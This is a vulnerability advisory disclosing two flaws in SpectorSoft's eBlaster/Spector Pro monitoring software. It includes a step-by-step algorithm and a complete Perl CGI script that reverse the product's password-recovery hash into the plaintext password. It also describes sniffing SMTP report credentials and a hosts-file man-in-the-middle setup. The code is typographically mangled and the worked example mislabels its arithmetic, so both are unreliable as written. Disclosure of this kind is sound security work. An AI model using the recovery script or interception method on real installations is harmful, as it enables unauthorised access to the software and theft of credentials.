(This information is quite old and we are sure if it is still valid. However, the vendor never responded to what we sent them even with assistance of CERT. This was assigned VU#707817 in 2006.)
Original Message
Subject: Re: Two vulnerabilities in SpectorSoft products VU#707817
Date: Mon, 20 Nov 2006 17:10:13 -0500
To: CERT(R) Coordination Center
Background
Spectorsoft Corp makes several products for monitoring computer and
Internet usage including eBlaster, Spector Pro, and others. Some of the
programs provide an option to email copies of the reports to the
subscriber via regular SMTP.
Also, the software provides ability for a user who forgot his password
to the software, to recover it by pressing a hidden key combination 6
times and obtain a special “hash” code. The hash code is sent to the
vendor and a password is returned. This process is posted publically on
the vendor’s website (link no longer valid):
http://www.spectorsoft.com/support/eblaster_windows/faq.html
Vulnerability #1
The algorithm used to generate the lost password hashes is not secure,
and easily crackable, thus allowing anyone to easily access an installed
copy of the vendor’s product even if a password is unknown. THIS
INFORMATION WAS OBTAINED BY SIMPLY ANALYZING A PASSWORD HASH FOR A KNOWN PASSWORD. This could have been easily remedied by using a form of public/private key encryption.
Second, the viewer executable which allows for login is easily found in
WINDOWSSYSTEM32 directory — it is usually a 1.5 or 3 MB executible and
can be found there even on a system where the software is running in
stealth mode.
The algorithm for decoding the hash is as follows:
1. Given numeric hash of 7 numbers as follows:
288–1488–1776–336–624–912–5424
2. The first number is a magic value:
288
3. The last number is a checksum, equivalent to the sum of all numbers
in the hash. In this example:
288 + 1488 + 1776 + 336 + 624 + 912 = 5424
4. Taking the lowest number in the hash excluding the first and the
last, gives your the first character. Going from there and wrapping to
the front gives you the rest”:
288–1488–1776–336–624–912–5424
4 5 6 1 2 3
5. Dividing each number except the first, by the magic value and adding
its place # gives you the ASCII value of the password:
#1 | 3 | 336 mod 288 = 48 | 48 + 1 = 49 | 1 | #2 | 4 | 624 mod 288 = 48 | 48 + 2 = 50 | 2 | #3 | 5 | 912 mod 288 = 48 | 48 + 3 = 51 | 3 | #4 | 6 | 288 / 6 = 48 | 48 + 4 = 52 | 4 | #5 | 1 | 1488 mod 288 = 48 | 48 + 5 = 53 | 5 | #6 | 2 | 1776 mod 288 = 48 | 48 + 6 = 54 | 6 |
6. The first number’s value is equal to the itself divided by the total
amount of numbers excluding the checksum:
288 / 6 = 48
7. The result is: ‘123456’
The perl code is as follows.
#!/usr/bin/perl
use lib qw(.); use CGI; use CGI::Carp qw(fatalsToBrowser);
# — — Check for parameters — -
if ($ENV{‘REQUEST_METHOD’} eq “GET”)
{ $in = $ENV{‘QUERY_STRING’}; }
else
{ $in = <STDIN>; }
$q=new CGI($in);
if($q->param(‘hash’) eq ‘’)
{ print “Content-Type: text/plainnn”;
print “500 ERROR: Missing parameter ‘hash’.n”;
exit;
}
# — — prepare parameters — - my $hash_raw = $q->param(‘hash’); my $dd = $q->param(‘dd’); my $count = ($hash_raw =~ tr/-//); my @nums = split(‘-’, $hash_raw); my $magic = @nums[0]; my $sum = @nums[$count]; my $lowest = $count;
# — — check the checksum — -
my $check = 0;
for($i=0; $i < $count; $i++) {
$check = $check + @nums[$i];
}
if($check != $sum) {
print “Content-Type: text/plainnn”;
print “Checksum DOES NOT match: is $check, must be $sum!n”;
exit;
}
print “Content-Type: text/htmlnn”; print “<html><head><title>Hash Calculator (c) 2006</title></head><body>”; print “<hr/><h1>Hash Calculator (c) 2006</h1><hr/>”;
print “<table border=’1'><tr><th>Name</th><th>Value</th></tr>”; print “<tr><td>Original Hash</td><td>$hash_raw</td></tr>”; print “<tr><td>Total Characters</td><td>$count</td></tr>”;
if($dd eq ‘y’) {
print “<tr><td>Magic Value</td><td>$magic</td></tr>”;
print “<tr><td>Checksum</td><td>$check = $sum (matches!)</td></tr>”;
}
# — — find the lowest number — -
for($i=1; $i < $count; $i++) {
if(@nums[$i] < @nums[$lowest]) {
$lowest = $i;
}
}
if($dd eq ‘y’) {
print “<tr><td>Starting Slot</td><td>$lowest</td></tr>”;
print “<tr><td>Starting slot value</td><td>@nums[$lowest]</td></tr>”;
print “<tr><td colspan=’2'>Calculation table below :</td></tr>”;
print “<tr><td colspan=’2'>”;
}
# — — print the first part of the result — -
my $pass = ‘’;
my $j = 1;
for($i = $lowest; $i < $count; $i++) {
my $raw = @nums[$i] — $magic*$j;
my $res = $raw + $j;
my $ch = chr($res);
$pass = $pass . $ch;
if($dd eq ‘y’) {
print “#$j | $i | @nums[$i] — ($magic*$j) = $raw | $raw + $j =
$res | $ch |<br/>”;
}
$j++;
}
# — — process the magic part — -
my $raw = @nums[0] / $count;
my $res = $raw + $j;
my $ch = chr($res);
$pass = $pass . $ch;
if($dd eq ‘y’) {
print “<b>#$j | $i | @nums[0] / $count = $raw | $raw + $j = $res |
$ch |</b><br/>”;
}
$j++;
# — — process the rest — -
for($i = 1; $i < $lowest; $i++) {
my $raw = @nums[$i] — $magic*$j;
my $res = $raw + $j;
my $ch = chr($res);
$pass = $pass . $ch;
if($dd eq ‘y’) {
print “#$j | $i | @nums[$i] — ($magic*$j) = $raw | $raw + $j =
$res | $ch |<br/>”;
}
$j++;
}
if($dd eq ‘y’) {
print “</td></tr>”;
}
print “<tr><td>Password</td><td><b>$pass</b></td></tr>”;
print “</table><hr/></body></html>”;
exit;
Vulnerability #2
This is more of a design issue. When eBlaster is used to send reports
via SMTP the software is subject to a man in the middle act. By
monitoring network traffic one can see the email account and credentials
to which the reports are being sent, leading to a possibility of
exposing security credentials AND ability to fake the reports. The
reports are not digitally signed or encrypted.
Additionally, even when using TLS, it is possible in theory to run a man
in the middle attack by mapping the destination SMTP server’s IP to
localhost via hosts.txt, and running a rougue SMTP server with TLS locally.
Credits
The original team that discovered this issue wishes to remain anonymous. Written by Yakov Shafranovich in collaboration with Shaftek Enterprises Security Research Team
Nightwatch Cybersecurity 